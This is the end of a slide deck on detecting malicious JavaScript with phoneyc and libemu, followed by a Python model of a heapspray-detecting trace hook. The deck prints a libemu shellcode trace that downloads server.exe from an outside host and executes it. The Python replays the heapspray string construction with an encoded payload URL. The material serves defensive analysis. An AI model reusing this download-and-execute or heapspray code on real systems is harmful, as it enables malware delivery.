    UINT GetSystemDirectory (
        LPTSTR lpBuffer = 0x0012fe5f =>
            none;
        UINT uSize = 32;
    ) = 19;
    HRESULT URLDownloadToFile (
  • 30. Analysis of The Shellcode using libemu III
        LPUNKNOWN pCaller = 0x00000000 =>
            none;
        LPCTSTR szURL = 0x0041715a =>
            = "http://1v1.name/server.exe";
        LPCTSTR szFileName = 0x0012fe5f =>
            = "c:\WINDOWS\system32\a.exe";
        DWORD dwReserved = 0;
        LPBINDSTATUSCALLBACK lpfnCB = 0;
    ) = 0;
    UINT WINAPI WinExec (
        LPCSTR lpCmdLine = 0x0012fe58 =>
            = "cmd /c c:\WINDOWS\system32\a.exe";
        UINT uCmdShow = 0;
    ) = 32;
  • 31. Thank you!
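The trace hook of slides 17 to 24 (fire on every bytecode, inspect only the JOF_SET assignment opcodes, test the r-value on top of the stack, count repeated hits on the same payload as a heapspray sign), modelled in Python as an added example. This is not phoneyc's honeyjs module and does not call libemu: the shellcode test is a stand-in NOP-sled heuristic (libemu's GetPC emulation is not reproduced), the opcode table is an assumed subset named after the SpiderMonkey opcodes on slide 18, and MIN_SLED and HEAPSPRAY_THRESHOLD are assumed constants. The replayed script follows slides 6 and 7 with a reduced block size; it uses the page's own %u string tail, with a constructed run of %u9090 standing in for the payload the page elides. It also shows why the sled is x86 NOPs at all: each %uXXXX is one UTF-16 code unit, so %u9090 occupies the bytes 90 90 in memory and %u7468%u7074 spells "http".

```python
"""Model of a honeyjs-style assignment hook (added example; not phoneyc code)."""
import hashlib
import re
from collections import Counter

NOP = 0x90
MIN_SLED = 8               # assumption: shortest run of NOPs treated as a sled
HEAPSPRAY_THRESHOLD = 50   # assumption: repeated hits on one payload before a heapspray alert

# Assumed subset of SpiderMonkey opcodes. Only the ones flagged JOF_SET are
# inspected, mirroring slide 19: every assignment opcode shares that bit.
JOF_SET = 0x01
OPCODE_FLAGS = {
    "setname": JOF_SET, "setvar": JOF_SET, "setprop": JOF_SET,
    "setelem": JOF_SET, "setarg": JOF_SET,
    "bindname": 0, "string": 0, "pop": 0, "zero": 0, "stop": 0,
}

_ESC = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")

def js_unescape(s: str) -> str:
    """JavaScript unescape(): %uXXXX and %XX each become one UTF-16 code unit."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def js_string_bytes(s: str) -> bytes:
    """The bytes a JS string occupies in memory (UTF-16LE): %u9090 -> 90 90."""
    return s.encode("utf-16-le")

def sled_payload(buf: bytes):
    """Stand-in for libemu's shellcode test (assumption, not GetPC emulation):
    locate the longest run of NOPs; if it is at least MIN_SLED bytes and is
    followed by non-NOP bytes, return (offset_after_sled, payload_bytes)."""
    best_len = best_end = run = 0
    for i, b in enumerate(buf):
        run = run + 1 if b == NOP else 0
        if run > best_len:
            best_len, best_end = run, i + 1
    if best_len >= MIN_SLED and best_end < len(buf):
        return best_end, buf[best_end:]
    return None   # no sled, or a sled with nothing behind it (e.g. bigblock)

class HoneyJSTrap:
    """Plays the role of the JS_SetInterrupt handler: called once per bytecode
    with the opcode, the assignment target and the r-value on top of the stack."""
    def __init__(self):
        self.hits = Counter()   # payload fingerprint -> number of mal-assignments
        self.alerts = []        # (kind, target, sled offset, running hit count)

    def trap(self, opcode: str, target: str, rvalue):
        if not (OPCODE_FLAGS.get(opcode, 0) & JOF_SET):
            return None         # not an assignment: let the interpreter continue
        if not isinstance(rvalue, str):
            return None         # only string r-values can carry a sled
        found = sled_payload(js_string_bytes(rvalue))
        if found is None:
            return None
        offset, payload = found
        key = hashlib.sha256(payload).hexdigest()[:16]
        self.hits[key] += 1     # the "variable counter" of slide 24
        kind = "heapspray" if self.hits[key] >= HEAPSPRAY_THRESHOLD else "shellcode"
        self.alerts.append((kind, target, offset, self.hits[key]))
        return kind

# Tail of the page's own shellcode string (slide 6). The bytes before it are
# elided on the page, so a constructed NOP run stands in for them below.
PAGE_TAIL = ("%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672"
             "%u7265%u652e%u6578%u0000")

def replay_heapspray(trap: HoneyJSTrap, spray_count=100, heap_block=0x1000):
    """Replay the assignments of the slide 6-7 script through the trap, as the
    traced interpreter would see them (block size reduced from 0x40000)."""
    shellcode = js_unescape("%u9090" * 8 + PAGE_TAIL)       # constructed sled + page tail
    trap.trap("setname", "shellcode", shellcode)            # first hit: the shellcode itself
    bigblock = js_unescape("%u9090%u9090")
    slackspace = 20 + len(shellcode)
    while len(bigblock) < slackspace:
        bigblock += bigblock
    trap.trap("setname", "bigblock", bigblock)              # pure sled, no payload: no hit
    fillblock = bigblock[:slackspace]
    block = bigblock[:len(bigblock) - slackspace]
    while len(block) + slackspace < heap_block:
        block = block + block + fillblock
    trap.trap("setname", "block", block)                    # still all NOPs: no hit
    for x in range(spray_count):                            # the spray loop
        trap.trap("setelem", f"memory[{x}]", block + shellcode)
    trap.trap("setname", "buffer", "\x05" * 1024)           # trigger argument, no sled: no hit
    return trap

if __name__ == "__main__":
    t = replay_heapspray(HoneyJSTrap())
    for alert in (t.alerts[0], t.alerts[-1]):
        print("[ALERT] %s in %s at sled offset %d, HIT: %d" % alert)
```

Run stand-alone it reports one plain shellcode hit for the `shellcode` assignment and, by the end of the `memory[x]` loop, a heapspray alert with a hit count of 101 for the same payload, which is the shape of the two ALERT lines on slide 27. The design choice worth noting is the fingerprint: hits are keyed by the bytes behind the sled, so the same payload assigned through a different variable still accumulates, whereas all-NOP strings such as `bigblock` never fire.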